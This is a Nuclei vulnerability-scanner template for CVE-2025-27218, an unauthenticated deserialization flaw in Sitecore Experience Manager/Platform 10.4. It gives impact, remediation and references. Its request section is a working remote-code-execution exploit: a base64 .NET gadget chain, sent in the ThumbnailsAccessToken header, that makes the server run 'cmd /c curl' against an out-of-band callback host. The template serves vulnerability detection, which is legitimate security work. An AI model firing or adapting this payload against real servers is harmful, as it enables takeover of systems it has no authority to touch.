id: CVE-2025-27218

info:
  name: Sitecore Experience Manager (XM)/Experience Platform (XP) 10.4 - Insecure Deserialization
  author: iamnoooob,rootxharsh,pdresearch
  severity: medium
  description: |
    Sitecore Experience Manager (XM) and Experience Platform (XP) 10.4 before KB1002844 allow remote code execution through insecure deserialization.
  impact: |
    Unauthenticated attackers can execute arbitrary code through insecure deserialization in the ThumbnailsAccessToken header, potentially gaining complete control over the Sitecore server.
  remediation: |
    Apply KB1002844 update for Sitecore Experience Manager (XM)/Experience Platform (XP) 10.4.
  reference:
    - https://slcyber.io/blog/sitecore-unsafe-deserialization-again-cve-2025-27218/
    - https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1003535
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2025-27218
    cwe-id: CWE-94
    epss-score: 0.6356
    epss-percentile: 0.99109
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2025,oast,oob,sitecore,rce,vkev,vuln

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        ThumbnailsAccessToken: {{ base64(base64_decode('AAEAAAD/////AQAAAAAAAAAEAQAAAClTeXN0ZW0uU2VjdXJpdHkuUHJpbmNpcGFsLldpbmRvd3NJZGVudGl0eQEAAAAkU3lzdGVtLlNlY3VyaXR5LkNsYWltc0lkZW50aXR5LmFjdG9yAQYCAAAAkA==') + hex_decode('0a') + base64(replace(base64_decode('AAEAAAD/////AQAAAAAAAAAMAgAAAF5NaWNyb3NvZnQuUG93ZXJTaGVsbC5FZGl0b3IsIFZlcnNpb249My4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1BQEAAABCTWljcm9zb2Z0LlZpc3VhbFN0dWRpby5UZXh0LkZvcm1hdHRpbmcuVGV4dEZvcm1hdHRpbmdSdW5Qcm9wZXJ0aWVzAQAAAA9Gb3JlZ3JvdW5kQnJ1c2gBAgAAAAYDAAAA7gU8P3htbCB2ZXJzaW9uPSIxLjAiIGVuY29kaW5nPSJ1dGYtMTYiPz4NCjxPYmplY3REYXRhUHJvdmlkZXIgTWV0aG9kTmFtZT0iU3RhcnQiIElzSW5pdGlhbExvYWRFbmFibGVkPSJGYWxzZSIgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiIgeG1sbnM6c2Q9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PVN5c3RlbSIgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiPg0KICA8T2JqZWN0RGF0YVByb3ZpZGVyLk9iamVjdEluc3RhbmNlPg0KICAgIDxzZDpQcm9jZXNzPg0KICAgICAgPHNkOlByb2Nlc3MuU3RhcnRJbmZvPg0KICAgICAgICA8c2Q6UHJvY2Vzc1N0YXJ0SW5mbyBBcmd1bWVudHM9Ii9jIGN1cmwgYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFiYmJiYmJjY2NjY2NjZGRkZCIgU3RhbmRhcmRFcnJvckVuY29kaW5nPSJ7eDpOdWxsfSIgU3RhbmRhcmRPdXRwdXRFbmNvZGluZz0ie3g6TnVsbH0iIFVzZXJOYW1lPSIiIFBhc3N3b3JkPSJ7eDpOdWxsfSIgRG9tYWluPSIiIExvYWRVc2VyUHJvZmlsZT0iRmFsc2UiIEZpbGVOYW1lPSJjbWQiIC8+DQogICAgICA8L3NkOlByb2Nlc3MuU3RhcnRJbmZvPg0KICAgIDwvc2Q6UHJvY2Vzcz4NCiAgPC9PYmplY3REYXRhUHJvdmlkZXIuT2JqZWN0SW5zdGFuY2U+DQo8L09iamVjdERhdGFQcm92aWRlcj4L'),'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbcccccccdddd', padding('http://{{interactsh-url}}/?','A',58,'suffix'))) + base64_decode('Cw==')) }}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - dns

      - type: word
        part: header
        words:
          - SC_ANALYTICS_GLOBAL_COOKIE
# digest: 4a0a004730450220353dee68a1caf806a8fc7f1dc47be24633912b1b8f6636cbcddd3682004e9f0c0221009aae00206e51e4cd975cb066e36e7f50f8e25a02e79e9bce82779ec67b6d00f7:922c64590222798bb761d5b6d8e72950